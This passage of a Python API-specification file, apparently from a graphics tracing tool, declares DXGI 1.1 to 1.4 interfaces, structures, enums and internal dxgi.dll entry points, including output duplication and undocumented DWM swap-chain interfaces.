StdMethod(HRESULT, "QueryResourceResidency", [(Array(Const(ObjPointer(IUnknown)), "NumResources"), "ppResources"), Out(Array(DXGI_RESIDENCY, "NumResources"), "pResidencyStatus"), (UINT, "NumResources")], sideeffects=False),
StdMethod(HRESULT, "SetGPUThreadPriority", [(INT, "Priority")]),
StdMethod(HRESULT, "GetGPUThreadPriority", [Out(Pointer(INT), "pPriority")], sideeffects=False),
]
DXGI_ADAPTER_FLAG = FakeEnum(UINT, [
"DXGI_ADAPTER_FLAG_NONE",
"DXGI_ADAPTER_FLAG_REMOTE",
"DXGI_ADAPTER_FLAG_SOFTWARE",
])
DXGI_ADAPTER_DESC1 = Struct("DXGI_ADAPTER_DESC1", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
DXGI_DISPLAY_COLOR_SPACE = Struct("DXGI_DISPLAY_COLOR_SPACE", [
(Array(Array(FLOAT, 8), 2), "PrimaryCoordinates"),
(Array(Array(FLOAT, 16), 2), "WhitePoints"),
])
IDXGIFactory1.methods += [
StdMethod(HRESULT, "EnumAdapters1", [(UINT, "Adapter"), Out(Pointer(ObjPointer(IDXGIAdapter1)), "ppAdapter")]),
StdMethod(BOOL, "IsCurrent", [], sideeffects=False),
]
IDXGIAdapter1.methods += [
StdMethod(HRESULT, "GetDesc1", [Out(Pointer(DXGI_ADAPTER_DESC1), "pDesc")], sideeffects=False),
]
IDXGIDevice1.methods += [
StdMethod(HRESULT, "SetMaximumFrameLatency", [(UINT, "MaxLatency")]),
StdMethod(HRESULT, "GetMaximumFrameLatency", [Out(Pointer(UINT), "pMaxLatency")], sideeffects=False),
]
dxgi = Module('dxgi')
dxgi.addInterfaces([
IDXGIKeyedMutex,
IDXGIFactory1,
IDXGIDevice1,
IDXGIAdapter1,
IDXGIResource,
])
dxgi.addFunctions([
StdFunction(HRESULT, "CreateDXGIFactory", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
StdFunction(HRESULT, "CreateDXGIFactory1", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
StdFunction(HRESULT, "DXGID3D10CreateDevice", [(HMODULE, "hModule"), (ObjPointer(IDXGIFactory), "pFactory"), (ObjPointer(IDXGIAdapter), "pAdapter"), (UINT, "Flags"), (OpaquePointer(Const(IUnknown)), "pUnknown"), Out(Pointer(ObjPointer(Void)), "ppDevice")], internal=True),
StdFunction(HRESULT, "DXGID3D10CreateLayeredDevice", [(UINT), (UINT), (UINT), (UINT), (UINT)], internal=True),
StdFunction(SIZE_T, "DXGID3D10GetLayeredDeviceSize", [(OpaqueArray(Const(Void), "NumLayers"), "pLayers"), (UINT, "NumLayers")], internal=True),
StdFunction(HRESULT, "DXGID3D10RegisterLayers", [(OpaqueArray(Const(Void), "NumLayers"), "pLayers"), (UINT, "NumLayers")], internal=True),
])
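# Hedged note: the DXGID3D10* entry points are undocumented dxgi.dll exports
# used by the D3D10/D3D11 runtimes to create devices through DXGI;
# internal=True presumably keeps them out of the public traced API surface.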
#
# DXGI 1.2
#
IDXGIDisplayControl = Interface("IDXGIDisplayControl", IUnknown)
IDXGIDisplayControl.methods += [
StdMethod(BOOL, "IsStereoEnabled", [], sideeffects=False),
StdMethod(Void, "SetStereoEnabled", [(BOOL, "enabled")]),
]
DXGI_OUTDUPL_MOVE_RECT = Struct("DXGI_OUTDUPL_MOVE_RECT", [
(POINT, "SourcePoint"),
(RECT, "DestinationRect"),
])
DXGI_OUTDUPL_DESC = Struct("DXGI_OUTDUPL_DESC", [
(DXGI_MODE_DESC, "ModeDesc"),
(DXGI_MODE_ROTATION, "Rotation"),
(BOOL, "DesktopImageInSystemMemory"),
])
DXGI_OUTDUPL_POINTER_POSITION = Struct("DXGI_OUTDUPL_POINTER_POSITION", [
(POINT, "Position"),
(BOOL, "Visible"),
])
DXGI_OUTDUPL_POINTER_SHAPE_TYPE = Enum("DXGI_OUTDUPL_POINTER_SHAPE_TYPE", [
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_MONOCHROME",
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_COLOR",
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_MASKED_COLOR",
])
DXGI_OUTDUPL_POINTER_SHAPE_INFO = Struct("DXGI_OUTDUPL_POINTER_SHAPE_INFO", [
(UINT, "Type"),
(UINT, "Width"),
(UINT, "Height"),
(UINT, "Pitch"),
(POINT, "HotSpot"),
])
DXGI_OUTDUPL_FRAME_INFO = Struct("DXGI_OUTDUPL_FRAME_INFO", [
(LARGE_INTEGER, "LastPresentTime"),
(LARGE_INTEGER, "LastMouseUpdateTime"),
(UINT, "AccumulatedFrames"),
(BOOL, "RectsCoalesced"),
(BOOL, "ProtectedContentMaskedOut"),
(DXGI_OUTDUPL_POINTER_POSITION, "PointerPosition"),
(UINT, "TotalMetadataBufferSize"),
(UINT, "PointerShapeBufferSize"),
])
IDXGIOutputDuplication = Interface("IDXGIOutputDuplication", IDXGIObject)
IDXGIOutputDuplication.methods += [
StdMethod(Void, "GetDesc", [Out(Pointer(DXGI_OUTDUPL_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "AcquireNextFrame", [(UINT, "TimeoutInMilliseconds"), Out(Pointer(DXGI_OUTDUPL_FRAME_INFO), "pFrameInfo"), Out(Pointer(ObjPointer(IDXGIResource)), "ppDesktopResource")]),
StdMethod(HRESULT, "GetFrameDirtyRects", [(UINT, "DirtyRectsBufferSize"), Out(Array(RECT, "DirtyRectsBufferSize"), "pDirtyRectsBuffer"), Out(Pointer(UINT), "pDirtyRectsBufferSizeRequired")], sideeffects=False),
StdMethod(HRESULT, "GetFrameMoveRects", [(UINT, "MoveRectsBufferSize"), Out(Array(DXGI_OUTDUPL_MOVE_RECT, "MoveRectsBufferSize"), "pMoveRectBuffer"), Out(Pointer(UINT), "pMoveRectsBufferSizeRequired")], sideeffects=False),
StdMethod(HRESULT, "GetFramePointerShape", [(UINT, "PointerShapeBufferSize"), Out(OpaqueBlob(Void, "PointerShapeBufferSize"), "pPointerShapeBuffer"), Out(Pointer(UINT), "pPointerShapeBufferSizeRequired"), Out(Pointer(DXGI_OUTDUPL_POINTER_SHAPE_INFO), "pPointerShapeInfo")], sideeffects=False),
StdMethod(HRESULT, "MapDesktopSurface", [Out(Pointer(DXGI_MAPPED_RECT), "pLockedRect")], sideeffects=False),
StdMethod(HRESULT, "UnMapDesktopSurface", [], sideeffects=False),
StdMethod(HRESULT, "ReleaseFrame", []),
]
DXGI_ALPHA_MODE = Enum("DXGI_ALPHA_MODE", [
"DXGI_ALPHA_MODE_UNSPECIFIED",
"DXGI_ALPHA_MODE_PREMULTIPLIED",
"DXGI_ALPHA_MODE_STRAIGHT",
"DXGI_ALPHA_MODE_IGNORE",
])
IDXGISurface2 = Interface("IDXGISurface2", IDXGISurface1)
IDXGISurface2.methods += [
StdMethod(HRESULT, "GetResource", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppParentResource"), Out(Pointer(UINT), "pSubresourceIndex")]),
]
DXGI_SHARED_RESOURCE_FLAG = Flags(DWORD, [
"DXGI_SHARED_RESOURCE_READ",
"DXGI_SHARED_RESOURCE_WRITE",
])
IDXGIResource1 = Interface("IDXGIResource1", IDXGIResource)
IDXGIResource1.methods += [
StdMethod(HRESULT, "CreateSubresourceSurface", [(UINT, "index"), Out(Pointer(ObjPointer(IDXGISurface2)), "ppSurface")]),
StdMethod(HRESULT, "CreateSharedHandle", [(Pointer(Const(SECURITY_ATTRIBUTES)), "pAttributes"), (DXGI_SHARED_RESOURCE_FLAG, "dwAccess"), (LPCWSTR, "lpName"), Out(Pointer(HANDLE), "pHandle")]),
]
DXGI_OFFER_RESOURCE_PRIORITY = Enum("DXGI_OFFER_RESOURCE_PRIORITY", [
"DXGI_OFFER_RESOURCE_PRIORITY_LOW",
"DXGI_OFFER_RESOURCE_PRIORITY_NORMAL",
"DXGI_OFFER_RESOURCE_PRIORITY_HIGH",
])
IDXGIDevice2 = Interface("IDXGIDevice2", IDXGIDevice1)
IDXGIDevice2.methods += [
StdMethod(HRESULT, "OfferResources", [(UINT, "NumResources"), (Array(Const(ObjPointer(IDXGIResource)), "NumResources"), "ppResources"), (DXGI_OFFER_RESOURCE_PRIORITY, "Priority")]),
StdMethod(HRESULT, "ReclaimResources", [(UINT, "NumResources"), (Array(Const(ObjPointer(IDXGIResource)), "NumResources"), "ppResources"), Out(Pointer(BOOL), "pDiscarded")]),
StdMethod(HRESULT, "EnqueueSetEvent", [(HANDLE, "hEvent")], sideeffects=False),
]
DXGI_MODE_DESC1 = Struct("DXGI_MODE_DESC1", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_FORMAT, "Format"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
(BOOL, "Stereo"),
])
DXGI_SCALING = Enum("DXGI_SCALING", [
"DXGI_SCALING_STRETCH",
"DXGI_SCALING_NONE",
"DXGI_SCALING_ASPECT_RATIO_STRETCH",
])
DXGI_SWAP_CHAIN_DESC1 = Struct("DXGI_SWAP_CHAIN_DESC1", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_FORMAT, "Format"),
(BOOL, "Stereo"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
(DXGI_USAGE, "BufferUsage"),
(UINT, "BufferCount"),
(DXGI_SCALING, "Scaling"),
(DXGI_SWAP_EFFECT, "SwapEffect"),
(DXGI_ALPHA_MODE, "AlphaMode"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
DXGI_SWAP_CHAIN_FULLSCREEN_DESC = Struct("DXGI_SWAP_CHAIN_FULLSCREEN_DESC", [
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
(BOOL, "Windowed"),
])
DXGI_PRESENT_PARAMETERS = Struct("DXGI_PRESENT_PARAMETERS", [
(UINT, "DirtyRectsCount"),
(Array(RECT, "{self}.DirtyRectsCount"), "pDirtyRects"),
(Pointer(RECT), "pScrollRect"),
(Pointer(POINT), "pScrollOffset"),
])
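# Hedged note: the "{self}.DirtyRectsCount" length expression appears to let
# the pDirtyRects array size refer to the DirtyRectsCount member of the same
# structure, so the dirty-rect list is serialized with its actual element count.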
IDXGISwapChain1 = Interface("IDXGISwapChain1", IDXGISwapChain)
IDXGISwapChain1.methods += [
StdMethod(HRESULT, "GetDesc1", [(Out(Pointer(DXGI_SWAP_CHAIN_DESC1), "pDesc"))], sideeffects=False),
StdMethod(HRESULT, "GetFullscreenDesc", [(Out(Pointer(DXGI_SWAP_CHAIN_FULLSCREEN_DESC), "pDesc"))], sideeffects=False),
StdMethod(HRESULT, "GetHwnd", [(Out(Pointer(HWND), "pHwnd"))], sideeffects=False),
StdMethod(HRESULT, "GetCoreWindow", [(REFIID, "riid"), (Out(Pointer(ObjPointer(Void)), "ppUnk"))]),
StdMethod(HRESULT, "Present1", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags"), (Pointer(Const(DXGI_PRESENT_PARAMETERS)), "pPresentParameters")]),
StdMethod(BOOL, "IsTemporaryMonoSupported", [], sideeffects=False),
StdMethod(HRESULT, "GetRestrictToOutput", [(Out(Pointer(ObjPointer(IDXGIOutput)), "ppRestrictToOutput"))]),
StdMethod(HRESULT, "SetBackgroundColor", [(Pointer(Const(DXGI_RGBA)), "pColor")]),
StdMethod(HRESULT, "GetBackgroundColor", [(Out(Pointer(DXGI_RGBA), "pColor"))], sideeffects=False),
StdMethod(HRESULT, "SetRotation", [(DXGI_MODE_ROTATION, "Rotation")]),
StdMethod(HRESULT, "GetRotation", [(Out(Pointer(DXGI_MODE_ROTATION), "pRotation"))], sideeffects=False),
]
IDXGIFactory2 = Interface("IDXGIFactory2", IDXGIFactory1)
IDXGIFactory2.methods += [
StdMethod(BOOL, "IsWindowedStereoEnabled", [], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChainForHwnd", [(ObjPointer(IUnknown), "pDevice"), (HWND, "hWnd"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (Pointer(Const(DXGI_SWAP_CHAIN_FULLSCREEN_DESC)), "pFullscreenDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateSwapChainForCoreWindow", [(ObjPointer(IUnknown), "pDevice"), (ObjPointer(IUnknown), "pWindow"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "GetSharedResourceAdapterLuid", [(HANDLE, "hResource"), Out(Pointer(LUID), "pLuid")], sideeffects=False),
StdMethod(HRESULT, "RegisterStereoStatusWindow", [(HWND, "WindowHandle"), (UINT, "wMsg"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterStereoStatusEvent", [(HANDLE, "hEvent"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(Void, "UnregisterStereoStatus", [(DWORD, "dwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterOcclusionStatusWindow", [(HWND, "WindowHandle"), (UINT, "wMsg"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterOcclusionStatusEvent", [(HANDLE, "hEvent"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(Void, "UnregisterOcclusionStatus", [(DWORD, "dwCookie")], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChainForComposition", [(ObjPointer(IUnknown), "pDevice"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
]
DXGI_GRAPHICS_PREEMPTION_GRANULARITY = Enum("DXGI_GRAPHICS_PREEMPTION_GRANULARITY", [
"DXGI_GRAPHICS_PREEMPTION_DMA_BUFFER_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_PRIMITIVE_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_TRIANGLE_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_PIXEL_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_INSTRUCTION_BOUNDARY",
])
DXGI_COMPUTE_PREEMPTION_GRANULARITY = Enum("DXGI_COMPUTE_PREEMPTION_GRANULARITY", [
"DXGI_COMPUTE_PREEMPTION_DMA_BUFFER_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_DISPATCH_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_THREAD_GROUP_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_THREAD_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_INSTRUCTION_BOUNDARY",
])
DXGI_ADAPTER_DESC2 = Struct("DXGI_ADAPTER_DESC2", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
(DXGI_ADAPTER_FLAG, "Flags"),
(DXGI_GRAPHICS_PREEMPTION_GRANULARITY, "GraphicsPreemptionGranularity"),
(DXGI_COMPUTE_PREEMPTION_GRANULARITY, "ComputePreemptionGranularity"),
])
IDXGIAdapter2 = Interface("IDXGIAdapter2", IDXGIAdapter1)
IDXGIAdapter2.methods += [
StdMethod(HRESULT, "GetDesc2", [Out(Pointer(DXGI_ADAPTER_DESC2), "pDesc")], sideeffects=False),
]
IDXGIOutput1 = Interface("IDXGIOutput1", IDXGIOutput)
IDXGIOutput1.methods += [
StdMethod(HRESULT, "GetDisplayModeList1", [(DXGI_FORMAT, "EnumFormat"), (DXGI_ENUM_MODES, "Flags"), InOut(Pointer(UINT), "pNumModes"), Out(Array(DXGI_MODE_DESC1, "*pNumModes"), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "FindClosestMatchingMode1", [(Pointer(Const(DXGI_MODE_DESC1)), "pModeToMatch"), Out(Pointer(DXGI_MODE_DESC1), "pClosestMatch"), (ObjPointer(IUnknown), "pConcernedDevice")], sideeffects=False),
StdMethod(HRESULT, "GetDisplaySurfaceData1", [(ObjPointer(IDXGIResource), "pDestination")]),
StdMethod(HRESULT, "DuplicateOutput", [(ObjPointer(IUnknown), "pDevice"), Out(Pointer(ObjPointer(IDXGIOutputDuplication)), "ppOutputDuplication")]),
]
dxgi.addInterfaces([
IDXGIDisplayControl,
IDXGIDevice2,
IDXGISwapChain1,
IDXGIFactory2,
IDXGIResource1,
IDXGIAdapter2,
IDXGIOutput1,
])
#
# DXGI 1.3
#
DXGI_CREATE_FACTORY_FLAGS = Flags(UINT, [
"DXGI_CREATE_FACTORY_DEBUG",
])
dxgi.addFunctions([
StdFunction(HRESULT, "CreateDXGIFactory2", [(DXGI_CREATE_FACTORY_FLAGS, "Flags"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
])
IDXGIDevice3 = Interface("IDXGIDevice3", IDXGIDevice2)
IDXGIDevice3.methods += [
StdMethod(Void, "Trim", []),
]
DXGI_MATRIX_3X2_F = Struct("DXGI_MATRIX_3X2_F", [
(FLOAT, "_11"),
(FLOAT, "_12"),
(FLOAT, "_21"),
(FLOAT, "_22"),
(FLOAT, "_31"),
(FLOAT, "_32"),
])
IDXGISwapChain2 = Interface("IDXGISwapChain2", IDXGISwapChain1)
IDXGISwapChain2.methods += [
StdMethod(HRESULT, "SetSourceSize", [(UINT, "Width"), (UINT, "Height")]),
StdMethod(HRESULT, "GetSourceSize", [Out(Pointer(UINT), "pWidth"), Out(Pointer(UINT), "pHeight")], sideeffects=False),
StdMethod(HRESULT, "SetMaximumFrameLatency", [(UINT, "MaxLatency")]),
StdMethod(HRESULT, "GetMaximumFrameLatency", [Out(Pointer(UINT), "pMaxLatency")], sideeffects=False),
StdMethod(HANDLE, "GetFrameLatencyWaitableObject", [], sideeffects=False),
StdMethod(HRESULT, "SetMatrixTransform", [(Pointer(Const(DXGI_MATRIX_3X2_F)), "pMatrix")]),
StdMethod(HRESULT, "GetMatrixTransform", [Out(Pointer(DXGI_MATRIX_3X2_F), "pMatrix")], sideeffects=False),
]
IDXGIOutput2 = Interface("IDXGIOutput2", IDXGIOutput1)
IDXGIOutput2.methods += [
StdMethod(BOOL, "SupportsOverlays", [], sideeffects=False),
]
IDXGIFactory3 = Interface("IDXGIFactory3", IDXGIFactory2)
IDXGIFactory3.methods += [
StdMethod(DXGI_CREATE_FACTORY_FLAGS, "GetCreationFlags", [], sideeffects=False),
]
DXGI_DECODE_SWAP_CHAIN_DESC = Struct("DXGI_DECODE_SWAP_CHAIN_DESC", [
(UINT, "Flags"),
])
# XXX: DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS is really a bitmask, but is declared
# as an Enum here rather than Flags.
DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS = Enum("DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS", [
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_NOMINAL_RANGE",
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_BT709",
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_xvYCC",
])
IDXGIDecodeSwapChain = Interface("IDXGIDecodeSwapChain", IUnknown)
IDXGIDecodeSwapChain.methods += [
StdMethod(HRESULT, "PresentBuffer", [(UINT, "BufferToPresent"), (UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "SetSourceRect", [(Pointer(Const(RECT)), "pRect")]),
StdMethod(HRESULT, "SetTargetRect", [(Pointer(Const(RECT)), "pRect")]),
StdMethod(HRESULT, "SetDestSize", [(UINT, "Width"), (UINT, "Height")]),
StdMethod(HRESULT, "GetSourceRect", [Out(Pointer(RECT), "pRect")], sideeffects=False),
StdMethod(HRESULT, "GetTargetRect", [Out(Pointer(RECT), "pRect")], sideeffects=False),
StdMethod(HRESULT, "GetDestSize", [Out(Pointer(UINT), "pWidth"), Out(Pointer(UINT), "pHeight")], sideeffects=False),
StdMethod(HRESULT, "SetColorSpace", [(DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS, "ColorSpace")]),
StdMethod(DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS, "GetColorSpace", [], sideeffects=False),
]
IDXGIFactoryMedia = Interface("IDXGIFactoryMedia", IUnknown)
IDXGIFactoryMedia.methods += [
StdMethod(HRESULT, "CreateSwapChainForCompositionSurfaceHandle", [(ObjPointer(IUnknown), "pDevice"), (HANDLE, "hSurface"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateDecodeSwapChainForCompositionSurfaceHandle", [(ObjPointer(IUnknown), "pDevice"), (HANDLE, "hSurface"), (Pointer(DXGI_DECODE_SWAP_CHAIN_DESC), "pDesc"), (ObjPointer(IDXGIResource), "pYuvDecodeBuffers"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGIDecodeSwapChain)), "ppSwapChain")]),
]
DXGI_FRAME_PRESENTATION_MODE = Enum("DXGI_FRAME_PRESENTATION_MODE", [
"DXGI_FRAME_PRESENTATION_MODE_COMPOSED",
"DXGI_FRAME_PRESENTATION_MODE_OVERLAY",
"DXGI_FRAME_PRESENTATION_MODE_NONE",
])
DXGI_FRAME_STATISTICS_MEDIA = Struct("DXGI_FRAME_STATISTICS_MEDIA", [
(UINT, "PresentCount"),
(UINT, "PresentRefreshCount"),
(UINT, "SyncRefreshCount"),
(LARGE_INTEGER, "SyncQPCTime"),
(LARGE_INTEGER, "SyncGPUTime"),
(DXGI_FRAME_PRESENTATION_MODE, "CompositionMode"),
(UINT, "ApprovedPresentDuration"),
])
IDXGISwapChainMedia = Interface("IDXGISwapChainMedia", IUnknown)
IDXGISwapChainMedia.methods += [
StdMethod(HRESULT, "GetFrameStatisticsMedia", [Out(Pointer(DXGI_FRAME_STATISTICS_MEDIA), "pStats")], sideeffects=False),
StdMethod(HRESULT, "SetPresentDuration", [(UINT, "Duration")]),
StdMethod(HRESULT, "CheckPresentDurationSupport", [(UINT, "DesiredPresentDuration"), Out(Pointer(UINT), "pClosestSmallerPresentDuration"), Out(Pointer(UINT), "pClosestLargerPresentDuration")], sideeffects=False),
]
DXGI_OVERLAY_SUPPORT_FLAG = FakeEnum(UINT, [
"DXGI_OVERLAY_SUPPORT_FLAG_DIRECT",
"DXGI_OVERLAY_SUPPORT_FLAG_SCALING",
])
IDXGIOutput3 = Interface("IDXGIOutput3", IDXGIOutput2)
IDXGIOutput3.methods += [
StdMethod(HRESULT, "CheckOverlaySupport", [(DXGI_FORMAT, "EnumFormat"), (ObjPointer(IUnknown), "pConcernedDevice"), Out(Pointer(DXGI_OVERLAY_SUPPORT_FLAG), "pFlags")], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIDevice3,
IDXGISwapChain2,
IDXGISwapChainMedia,
IDXGIOutput3,
IDXGIFactory3,
IDXGIFactoryMedia,
])
#
# Undocumented interfaces
#
IDXGIFactoryDWM = Interface("IDXGIFactoryDWM", IUnknown)
IDXGISwapChainDWM = Interface("IDXGISwapChainDWM", IDXGIDeviceSubObject)
IDXGIFactoryDWM.methods += [
StdMethod(HRESULT, "CreateSwapChain", [(ObjPointer(IUnknown), "pDevice"), (Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc"), (ObjPointer(IDXGIOutput), "pOutput"), Out(Pointer(ObjPointer(IDXGISwapChainDWM)), "ppSwapChain")]),
]
# http://shchetinin.blogspot.co.uk/2012/04/dwm-graphics-directx-win8win7.html
IDXGISwapChainDWM.methods += [
StdMethod(HRESULT, "Present", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "GetBuffer", [(UINT, "Buffer"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppSurface")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "ResizeBuffers", [(UINT, "BufferCount"), (UINT, "Width"), (UINT, "Height"), (DXGI_FORMAT, "NewFormat"), (DXGI_SWAP_CHAIN_FLAG, "SwapChainFlags")]),
StdMethod(HRESULT, "ResizeTarget", [(Pointer(Const(DXGI_MODE_DESC)), "pNewTargetParameters")]),
StdMethod(HRESULT, "GetContainingOutput", [Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
StdMethod(HRESULT, "GetLastPresentCount", [Out(Pointer(UINT), "pLastPresentCount")], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIFactoryDWM,
])
#
# DXGI 1.4
#
DXGI_COLOR_SPACE_TYPE = Enum('DXGI_COLOR_SPACE_TYPE', [
'DXGI_COLOR_SPACE_RGB_FULL_G22_NONE_P709',
'DXGI_COLOR_SPACE_RGB_FULL_G10_NONE_P709',
'DXGI_COLOR_SPACE_RGB_STUDIO_G22_NONE_P709',
'DXGI_COLOR_SPACE_RGB_STUDIO_G22_NONE_P2020',
'DXGI_COLOR_SPACE_RESERVED',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_NONE_P709_X601',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P601',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P601',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P709',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P709',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P2020',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P2020',
'DXGI_COLOR_SPACE_CUSTOM',
])
DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG = Enum('DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG', [
'DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG_PRESENT',
'DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG_OVERLAY_PRESENT',
])
DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG = Enum('DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG', [
'DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG_PRESENT',
])
DXGI_MEMORY_SEGMENT_GROUP = Enum('DXGI_MEMORY_SEGMENT_GROUP', [
'DXGI_MEMORY_SEGMENT_GROUP_LOCAL',
'DXGI_MEMORY_SEGMENT_GROUP_NON_LOCAL',
])
DXGI_QUERY_VIDEO_MEMORY_INFO = Struct('DXGI_QUERY_VIDEO_MEMORY_INFO', [
(UINT64, 'Budget'),
(UINT64, 'CurrentUsage'),
(UINT64, 'AvailableForReservation'),
(UINT64, 'CurrentReservation'),
])
IDXGISwapChain3 = Interface('IDXGISwapChain3', IDXGISwapChain2)
IDXGIOutput4 = Interface('IDXGIOutput4', IDXGIOutput3)
IDXGIFactory4 = Interface('IDXGIFactory4', IDXGIFactory3)
IDXGIAdapter3 = Interface('IDXGIAdapter3', IDXGIAdapter2)
IDXGISwapChain3.methods += [
StdMethod(UINT, 'GetCurrentBackBufferIndex', []),
StdMethod(HRESULT, 'CheckColorSpaceSupport', [(DXGI_COLOR_SPACE_TYPE, 'ColorSpace'), Out(Pointer(UINT), 'pColorSpaceSupport')], sideeffects=False),
StdMethod(HRESULT, 'SetColorSpace1', [(DXGI_COLOR_SPACE_TYPE, 'ColorSpace')]),
StdMethod(HRESULT, 'ResizeBuffers1', [(UINT, 'BufferCount'), (UINT, 'Width'), (UINT, 'Height'), (DXGI_FORMAT, 'Format'), (DXGI_SWAP_CHAIN_FLAG, 'SwapChainFlags'), (Pointer(Const(UINT)), 'pCreationNodeMask'), (Array(Const(ObjPointer(IUnknown)), 'BufferCount'), 'ppPresentQueue')]),
]
IDXGIOutput4.methods += [
StdMethod(HRESULT, 'CheckOverlayColorSpaceSupport', [(DXGI_FORMAT, 'Format'), (DXGI_COLOR_SPACE_TYPE, 'ColorSpace'), (ObjPointer(IUnknown), 'pConcernedDevice'), Out(Pointer(UINT), 'pFlags')], sideeffects=False),
]
IDXGIFactory4.methods += [
StdMethod(HRESULT, 'EnumAdapterByLuid', [(LUID, 'AdapterLuid'), (REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
StdMethod(HRESULT, 'EnumWarpAdapter', [(REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
]
IDXGIAdapter3.methods += [
StdMethod(HRESULT, 'RegisterHardwareContentProtectionTeardownStatusEvent', [(HANDLE, 'hEvent'), Out(Pointer(DWORD), 'pdwCookie')], sideeffects=False),
